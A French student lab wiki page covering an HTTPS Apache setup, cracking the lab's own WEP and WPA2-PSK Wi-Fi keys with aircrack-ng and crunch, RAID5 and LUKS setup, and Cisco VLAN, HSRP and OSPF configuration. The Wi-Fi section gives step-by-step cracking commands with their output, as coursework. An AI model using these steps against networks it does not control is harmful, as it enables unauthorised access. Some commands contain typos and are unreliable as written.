   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
